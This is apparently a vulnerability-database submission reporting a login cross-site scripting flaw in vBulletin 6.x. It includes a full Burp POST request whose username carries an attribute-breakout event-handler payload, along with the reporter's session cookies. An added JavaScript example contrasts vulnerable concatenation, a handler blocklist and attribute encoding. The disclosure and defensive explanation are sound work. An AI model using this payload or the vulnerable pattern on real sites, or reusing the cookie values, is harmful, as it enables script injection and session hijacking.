| Field | Value |
|---|---|
| Title | Cross Site Scripting in the vBulletin 6.xx forum / vBulletin 6.x.x Cross Site Scripting |
| Description | I am resubmitting report #797374, with proof of concept. I've identified an XSS vulnerability in the vBulletin forums, across all versions. Here's the POST request from Burp. PoC: https://vimeo.com/1186519525?fl=ip&fe=ec , https://ibb.co/ZRPpHLHP , https://github.com/chor4o/CVES/blob/main/Vbulletin |
| Source | ⚠️ https://forum.vbulletin.com |
| User | chor4o (UID 52584) |
| Submitted | 2026-04-25 16:08 (1 month ago) |
| Moderation | 2026-05-23 11:39 (28 days later) |
| Status | Accepted |
| VulDB entry | 365320 [vBulletin 6.x Login Cross-Site Scripting] |
| Points | 17 |

Burp request included in the description:

```http
POST / HTTP/2
Host: forum.vbulletin.com
Cookie: usprivacy=1---; eupubconsent-v2=CQiMiHgQiMiHgAcABBENCZFsAP_gAEPgACiQLGwLYAFAAWAA0AC4AGQAOAAhABUADQAHQAPQAiwBMAE2AKAAogBbAC-AGEANAAgwBHACUAFIAOQAeMBBwEIALSAgwBeYDGQGXgRmAjgBOACcYE5gJ0wTsBO8CewE_AJ_gUHAojBVQFVQK8AWHAsaCg8BQABYAFwAOAAqABcADQAHAARQAmABoAEcAOSAg4CEAEWAXeAvMCcwE6YJ2gncBQcAAAAA.f_wACHwAAAAA.ILGwMYAFAAWAA0AC4AGQAOAAhABUAC4AGgAOAAdAA9ACLAEwATYAoACiAFsAL4AYQA0ACDAEcAJQAUgA5AB4wEHAQgAiwBaQEGALvAXmAxkBl4EZgI4ATgAnGBOYCdME7ATvAnsBPwCf4FBwKIwVUBVUCvAFhwLGgAAA; OneTrustWPCCPAGoogleOptOut=false; _ga=GA1.1.2045348690.1775390766; OptanonAlertBoxClosed=2026-04-05T14:06:35.942Z; vblm_sessionhash=d359f6f56a3f300b074d9c0d20d26279; vblm_lastvisit=1776707668; PHPSESSID=rcukmdvaq665gdm257ukk3i3rl; cf_clearance=ZjxI6JiaC0mK5BLdgNhK6XEgitYVQ2PjVv5lWeHBi1g-1777125188-x.x.x.x-t9E0zVvStXomYW37OX5Px9NlnD8Z2m3l5q0Jvo9UxJTdykQhD1.LV4nf7lqsj1thVoAcqc5GV9TSc5SWWVwcv4vEHP6_zp5fCfIxmzARdAOlZJ27LeZqXvvVMgm62X8Y3L_L9GR0l2CzeHPO2fdvU1k8rSQ6qX7mVCEiHTjF1ByxWg4vKM1lv00wuUwc4Ezjwm0yZZihp3ChSw9u3hLUEylN7vUwGMPL9c7EBpMWp4USD._j5WULpru7IH_dplPy2iNTLmy1JzGWaIhbo9su87D3rKi52Wlb186uFPD.LnEMwAX48FSVYbhmRSMaHs6OyUYD9fl78K7JPZ0ee15l3r8hyTQZVt16zrqX2kOLj0RvN6gZhMNbYjMRYOtHgsBzP49KBdZFo_Wl8Dnpj8eclh0NNlbaQsNMz8VUnzqxKuI; __cf_bm=oWUhwmUPaBwfZiL7km86LYT5qDmwPMqDV.Wnahmskb0-1777125188.1108065-x.x.x.x-CYTzCD5LnBXF9YksjuiP4bl_NUP7DBg12rDbbZGRZACcwR_u2XCl7t8q3OYJUBJ7RMyW_if005cVfK_RE1ka1T0cL8LxIdBd_htN3KlNqw5nHQcOfd7dD9d8yYgYefaA; vblm_lastactivity=1777125345; OptanonConsent=isGpcEnabled=0&datestamp=Sat+Apr+25+2026+10%3A55%3A46+GMT-0300+(Hor%C3%A1rio+Padr%C3%A3o+de+Bras%C3%ADlia)&version=202511.1.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=9ae7fb6b-a610-472c-87bb-a870cae59449&interactionCount=3&isAnonUser=1&landingPath=NotLandingPage&groups=C0001%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CV2STACK42%3A1&genVendors=V4%3A1%2CV5%3A0%2C&AwaitingReconsent=false&intType=1&geolocation=BR%3BSP; _ga_VXDJZJWWH6=GS2.1.s1777125188$o12$g1$t1777125346$j19$l0$h0
Content-Length: 104
Sec-Ch-Ua-Full-Version-List:
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: pt-BR,pt;q=0.9
Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"
Sec-Ch-Ua-Bitness: ""
Sec-Ch-Ua-Model: ""
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Arch: ""
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Full-Version: ""
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Sec-Ch-Ua-Platform-Version: ""
Origin: https://forum.vbulletin.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://forum.vbulletin.com/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

username=asd'oncontentvisibilityautostatechange='alert(document.domain)' style='content-visibility:auto'
```
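The payload in the request body is an attribute-breakout: the leading `'` closes a single-quoted attribute that the username is reflected into, and what follows is parsed as two new attributes, an event handler and a `style`. The JavaScript below is an added example (not code from the report, from vBulletin or from VulDB) that models that bug class. The template shape, `<input name='username' value='...'>`, is an assumption; the report does not show vBulletin's markup. It contrasts raw concatenation with a handler blocklist (which the payload slips past because `oncontentvisibilityautostatechange` is not a "well known" handler) and with context-aware attribute encoding, which neutralises it.

```javascript
// Added example, not code from the report or from vBulletin.
// Models a login form that reflects the submitted username into a
// single-quoted HTML attribute (assumed template shape) and compares
// three ways of handling it.

// Payload taken from the report's request body (constructed test input here).
const PAYLOAD =
  "asd'oncontentvisibilityautostatechange='alert(document.domain)' style='content-visibility:auto";

// 1. Vulnerable: raw string concatenation into a single-quoted attribute.
function renderVulnerable(username) {
  return `<input name='username' value='${username}'>`;
}

// 2. Weak mitigation: blocklist of commonly abused handler names.
//    Any handler not on the list, such as the one in PAYLOAD, gets through.
const COMMON_HANDLERS = /on(click|load|error|mouseover|focus|input)\s*=/i;
function blocklistAllows(username) {
  return !COMMON_HANDLERS.test(username);
}

// 3. Hardened: encode every character with meaning inside an HTML attribute.
//    Encoding the quote means the reflected value can never close the attribute.
function escapeHtmlAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}
function renderHardened(username) {
  return `<input name='username' value='${escapeHtmlAttr(username)}'>`;
}

// Crude attribute tokenizer for a single <input ...> element: returns the
// attribute names the HTML parser would see, so we can tell whether the
// payload smuggled extra attributes onto the element.
function attributeNames(html) {
  const inner = html.slice('<input '.length, -1); // drop "<input " and ">"
  const re = /([^\s='"]+)=('([^']*)'|"([^"]*)"|[^\s'"]*)/g;
  const names = [];
  let m;
  while ((m = re.exec(inner)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Stand-alone demo: shows the three outcomes side by side.
function demo() {
  const vuln = attributeNames(renderVulnerable(PAYLOAD));
  const hard = attributeNames(renderHardened(PAYLOAD));
  console.log('vulnerable attributes :', vuln);
  console.log('blocklist allows it   :', blocklistAllows(PAYLOAD));
  console.log('hardened attributes   :', hard);
  return { vuln, hard, blocklistAllows: blocklistAllows(PAYLOAD) };
}
demo();
```

The vulnerable render yields four attributes (`name`, `value`, `oncontentvisibilityautostatechange`, `style`); the hardened render yields only `name` and `value`, with the quotes inside the value encoded as `&#x27;`. The payload pairs the handler with `style='content-visibility:auto'` because `contentvisibilityautostatechange` is the event Chromium fires for elements using that CSS property, so the handler runs without user interaction. Blocklists of handler names cannot keep up with the event catalogue; the durable fix is output encoding matched to the attribute context (plus a CSP that disallows inline handlers as defence in depth).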